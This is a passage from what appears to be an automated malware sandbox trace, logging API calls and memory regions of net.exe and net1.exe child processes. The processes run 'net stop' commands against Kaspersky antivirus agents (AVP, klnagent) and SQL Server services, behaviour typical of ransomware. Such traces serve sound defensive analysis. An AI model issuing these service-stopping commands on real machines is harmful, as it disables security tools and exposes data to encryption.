_Destination="NETMSG") returned 0x0 [0122.772] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0122.772] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0122.774] GetFileType (hFile=0xb) returned 0x2 [0122.823] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf958 | out: lpMode=0x1cf958) returned 1 [0122.823] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1cf950, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x1cf950*=0x1e) returned 1 [0122.824] GetFileType (hFile=0xb) returned 0x2 [0122.824] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf958 | out: lpMode=0x1cf958) returned 1 [0122.824] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf950, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x1cf950*=0x2) returned 1 [0122.824] _ultow (in: _Dest=0x889, _Radix=1898944 | out: _Dest=0x889) returned="2185" [0122.824] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0122.824] GetFileType (hFile=0xb) returned 0x2 [0122.825] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf958 | out: lpMode=0x1cf958) returned 1 [0122.825] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cf950, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x1cf950*=0x34) returned 1 [0122.825] GetFileType (hFile=0xb) returned 0x2 [0122.825] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf958 | out: lpMode=0x1cf958) returned 1 [0122.825] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf950, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x1cf950*=0x2) returned 1 [0122.826] NetApiBufferFree (Buffer=0x1f4d40) returned 0x0 [0122.826] NetApiBufferFree (Buffer=0x1fc0e0) returned 0x0 [0122.826] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop AVP /y" [0122.826] exit (_Code=2) Process: id = "398" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x724a7000" os_pid = "0xd28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$SQLEXPRESS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13779 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13780 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13781 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13782 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 13783 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13784 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13785 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13786 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13787 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13788 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13789 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 13790 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13791 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13792 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13793 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 13794 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13795 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13796 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13797 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 956 os_tid = 0xd00 Process: id = "399" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x77599000" os_pid = "0xedc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "393" os_parent_pid = "0xd20" cmd_line = "C:\\Windows\\system32\\net1 stop klnagent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13814 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13815 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13816 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13817 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 13818 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13819 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13820 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13821 start_va = 0xff260000 end_va = 0xff292fff entry_point = 0xff260000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13822 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13823 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13824 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 13825 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 13826 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13827 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13828 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 13829 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13830 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13831 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13832 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13833 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13834 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13835 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 13836 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13837 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13838 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13839 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13840 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13841 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13842 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13843 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13844 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13845 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13846 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13847 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13848 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13849 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13850 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13851 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13959 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 958 os_tid = 0xf40 [0123.425] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfcb0 | out: lpSystemTimeAsFileTime=0x1cfcb0*(dwLowDateTime=0xfeafbab0, dwHighDateTime=0x1d48689)) [0123.425] GetCurrentProcessId () returned 0xedc [0123.425] GetCurrentThreadId () returned 0xf40 [0123.425] GetTickCount () returned 0x287b5 [0123.425] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfcb8 | out: lpPerformanceCount=0x1cfcb8*=1817034300000) returned 1 [0123.426] GetModuleHandleW (lpModuleName=0x0) returned 0xff260000 [0123.426] __set_app_type (_Type=0x1) [0123.426] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff279c9c) returned 0x0 [0123.426] __getmainargs (in: _Argc=0xff284780, _Argv=0xff284790, _Env=0xff284788, _DoWildCard=0, _StartInfo=0xff28479c | out: _Argc=0xff284780, _Argv=0xff284790, _Env=0xff284788) returned 0 [0123.426] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0123.426] GetConsoleOutputCP () returned 0x1b5 [0123.426] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff28cec0 | out: lpCPInfo=0xff28cec0) returned 1 [0123.427] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0123.428] sprintf_s (in: _DstBuf=0x1cfc58, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0123.428] setlocale (category=0, locale=".437") returned="English_United States.437" [0123.430] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0123.430] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0123.430] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop klnagent /y" [0123.430] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf9f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0123.430] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0123.430] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfc48 | out: Buffer=0x1cfc48*=0x3d4d40) returned 0x0 [0123.430] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfc48 | out: Buffer=0x1cfc48*=0x3dc0e0) returned 0x0 [0123.430] _fileno (_File=0x7fefdba2a80) returned 0 [0123.430] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0123.430] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0123.430] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0123.430] _wcsicmp (_String1="config", _String2="stop") returned -16 [0123.430] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0123.430] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0123.430] _wcsicmp (_String1="file", _String2="stop") returned -13 [0123.430] _wcsicmp (_String1="files", _String2="stop") returned -13 [0123.430] _wcsicmp (_String1="group", _String2="stop") returned -12 [0123.430] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0123.430] _wcsicmp (_String1="help", _String2="stop") returned -11 [0123.430] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0123.430] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0123.430] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0123.430] _wcsicmp (_String1="session", _String2="stop") returned -15 [0123.430] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0123.431] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0123.431] _wcsicmp (_String1="share", _String2="stop") returned -12 [0123.431] _wcsicmp (_String1="start", _String2="stop") returned -14 [0123.431] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0123.431] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0123.431] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0123.431] _wcsicmp (_String1="accounts", _String2="klnagent") returned -10 [0123.431] _wcsicmp (_String1="computer", _String2="klnagent") returned -8 [0123.431] _wcsicmp (_String1="config", _String2="klnagent") returned -8 [0123.431] _wcsicmp (_String1="continue", _String2="klnagent") returned -8 [0123.431] _wcsicmp (_String1="cont", _String2="klnagent") returned -8 [0123.431] _wcsicmp (_String1="file", _String2="klnagent") returned -5 [0123.431] _wcsicmp (_String1="files", _String2="klnagent") returned -5 [0123.431] _wcsicmp (_String1="group", _String2="klnagent") returned -4 [0123.431] _wcsicmp (_String1="groups", _String2="klnagent") returned -4 [0123.431] _wcsicmp (_String1="help", _String2="klnagent") returned -3 [0123.431] _wcsicmp (_String1="helpmsg", _String2="klnagent") returned -3 [0123.431] _wcsicmp (_String1="localgroup", _String2="klnagent") returned 1 [0123.431] _wcsicmp (_String1="pause", _String2="klnagent") returned 5 [0123.431] _wcsicmp (_String1="session", _String2="klnagent") returned 8 [0123.431] _wcsicmp (_String1="sessions", _String2="klnagent") returned 8 [0123.431] _wcsicmp (_String1="sess", _String2="klnagent") returned 8 [0123.431] _wcsicmp (_String1="share", _String2="klnagent") returned 8 [0123.431] _wcsicmp (_String1="start", _String2="klnagent") returned 8 [0123.431] _wcsicmp (_String1="stats", _String2="klnagent") returned 8 [0123.431] _wcsicmp (_String1="statistics", _String2="klnagent") returned 8 [0123.431] _wcsicmp (_String1="stop", _String2="klnagent") returned 8 [0123.431] _wcsicmp (_String1="time", _String2="klnagent") returned 9 [0123.431] _wcsicmp (_String1="user", _String2="klnagent") returned 10 [0123.431] _wcsicmp (_String1="users", _String2="klnagent") returned 10 [0123.431] _wcsicmp (_String1="msg", _String2="klnagent") returned 2 [0123.431] _wcsicmp (_String1="messenger", _String2="klnagent") returned 2 [0123.431] _wcsicmp (_String1="receiver", _String2="klnagent") returned 7 [0123.431] _wcsicmp (_String1="rcv", _String2="klnagent") returned 7 [0123.431] _wcsicmp (_String1="netpopup", _String2="klnagent") returned 3 [0123.431] _wcsicmp (_String1="redirector", _String2="klnagent") returned 7 [0123.431] _wcsicmp (_String1="redir", _String2="klnagent") returned 7 [0123.431] _wcsicmp (_String1="rdr", _String2="klnagent") returned 7 [0123.431] _wcsicmp (_String1="workstation", _String2="klnagent") returned 12 [0123.431] _wcsicmp (_String1="work", _String2="klnagent") returned 12 [0123.431] _wcsicmp (_String1="wksta", _String2="klnagent") returned 12 [0123.431] _wcsicmp (_String1="prdr", _String2="klnagent") returned 5 [0123.432] _wcsicmp (_String1="devrdr", _String2="klnagent") returned -7 [0123.432] _wcsicmp (_String1="lanmanworkstation", _String2="klnagent") returned 1 [0123.432] _wcsicmp (_String1="server", _String2="klnagent") returned 8 [0123.432] _wcsicmp (_String1="svr", _String2="klnagent") returned 8 [0123.432] _wcsicmp (_String1="srv", _String2="klnagent") returned 8 [0123.432] _wcsicmp (_String1="lanmanserver", _String2="klnagent") returned 1 [0123.432] _wcsicmp (_String1="alerter", _String2="klnagent") returned -10 [0123.432] _wcsicmp (_String1="netlogon", _String2="klnagent") returned 3 [0123.432] _wcsupr (in: _String="klnagent" | out: _String="KLNAGENT") returned="KLNAGENT" [0123.432] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3dcdf0 [0123.557] GetServiceKeyNameW (in: hSCManager=0x3dcdf0, lpDisplayName="KLNAGENT", lpServiceName=0xff285750, lpcchBuffer=0x1cfb68 | out: lpServiceName="", lpcchBuffer=0x1cfb68) returned 0 [0123.558] _wcsicmp (_String1="msg", _String2="KLNAGENT") returned 2 [0123.558] _wcsicmp (_String1="messenger", _String2="KLNAGENT") returned 2 [0123.558] _wcsicmp (_String1="receiver", _String2="KLNAGENT") returned 7 [0123.558] _wcsicmp (_String1="rcv", _String2="KLNAGENT") returned 7 [0123.558] _wcsicmp (_String1="redirector", _String2="KLNAGENT") returned 7 [0123.558] _wcsicmp (_String1="redir", _String2="KLNAGENT") returned 7 [0123.558] _wcsicmp (_String1="rdr", _String2="KLNAGENT") returned 7 [0123.558] _wcsicmp (_String1="workstation", _String2="KLNAGENT") returned 12 [0123.558] _wcsicmp (_String1="work", _String2="KLNAGENT") returned 12 [0123.558] _wcsicmp (_String1="wksta", _String2="KLNAGENT") returned 12 [0123.558] _wcsicmp (_String1="prdr", _String2="KLNAGENT") returned 5 [0123.558] _wcsicmp (_String1="devrdr", _String2="KLNAGENT") returned -7 [0123.558] _wcsicmp (_String1="lanmanworkstation", _String2="KLNAGENT") returned 1 [0123.558] _wcsicmp (_String1="server", _String2="KLNAGENT") returned 8 [0123.558] _wcsicmp (_String1="svr", _String2="KLNAGENT") returned 8 [0123.558] _wcsicmp (_String1="srv", _String2="KLNAGENT") returned 8 [0123.558] _wcsicmp (_String1="lanmanserver", _String2="KLNAGENT") returned 1 [0123.558] _wcsicmp (_String1="alerter", _String2="KLNAGENT") returned -10 [0123.558] _wcsicmp (_String1="netlogon", _String2="KLNAGENT") returned 3 [0123.558] NetServiceControl (in: servername=0x0, service="KLNAGENT", opcode=0x0, arg=0x0, bufptr=0x1cfb70 | out: bufptr=0x1cfb70) returned 0x889 [0123.559] wcscpy_s (in: _Destination=0xff2880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0123.559] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0123.560] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff285b50, nSize=0x800, Arguments=0xff287f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0123.562] GetFileType (hFile=0xb) returned 0x2 [0123.562] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa38 | out: lpMode=0x1cfa38) returned 1 [0123.562] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff285b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1cfa30, lpReserved=0x0 | out: lpBuffer=0xff285b50*, lpNumberOfCharsWritten=0x1cfa30*=0x1e) returned 1 [0123.562] GetFileType (hFile=0xb) returned 0x2 [0123.562] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa38 | out: lpMode=0x1cfa38) returned 1 [0123.563] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff261efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cfa30, lpReserved=0x0 | out: lpBuffer=0xff261efc*, lpNumberOfCharsWritten=0x1cfa30*=0x2) returned 1 [0123.563] _ultow (in: _Dest=0x889, _Radix=1899168 | out: _Dest=0x889) returned="2185" [0123.563] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff285b50, nSize=0x800, Arguments=0xff287f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0123.563] GetFileType (hFile=0xb) returned 0x2 [0123.563] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa38 | out: lpMode=0x1cfa38) returned 1 [0123.564] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff285b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cfa30, lpReserved=0x0 | out: lpBuffer=0xff285b50*, lpNumberOfCharsWritten=0x1cfa30*=0x34) returned 1 [0123.564] GetFileType (hFile=0xb) returned 0x2 [0123.564] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cfa38 | out: lpMode=0x1cfa38) returned 1 [0123.564] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff261efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cfa30, lpReserved=0x0 | out: lpBuffer=0xff261efc*, lpNumberOfCharsWritten=0x1cfa30*=0x2) returned 1 [0123.565] NetApiBufferFree (Buffer=0x3d4d40) returned 0x0 [0123.565] NetApiBufferFree (Buffer=0x3dc0e0) returned 0x0 [0123.565] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop klnagent /y" [0123.565] exit (_Code=2) Process: id = "400" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x22bf2000" os_pid = "0x12b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "394" os_parent_pid = "0x288" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SQLEXPRESS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13852 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13853 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13854 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13855 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 13856 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13857 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13858 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = 